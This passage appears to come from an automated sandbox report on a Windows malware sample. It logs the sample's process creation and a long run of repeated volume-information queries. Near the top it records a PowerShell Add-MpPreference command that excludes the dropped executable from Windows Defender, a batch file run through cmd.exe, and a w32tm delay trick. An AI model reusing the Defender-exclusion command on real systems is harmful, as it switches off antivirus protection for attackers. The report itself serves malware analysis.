                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellExperiences\uAsLgsGzSk.exe "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091F654 cpuid 0_2_0091F654
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0091AF0F
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeQueries volume information: C:\HyperWebbroker\serverBrokerperfMonitor.exe VolumeInformationJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Recovery\uAsLgsGzSk.exeQueries volume information: C:\Recovery\uAsLgsGzSk.exe VolumeInformation
                                    Source: C:\Recovery\uAsLgsGzSk.exeQueries volume information: C:\Recovery\uAsLgsGzSk.exe VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\ShellExperiences\uAsLgsGzSk.exe VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
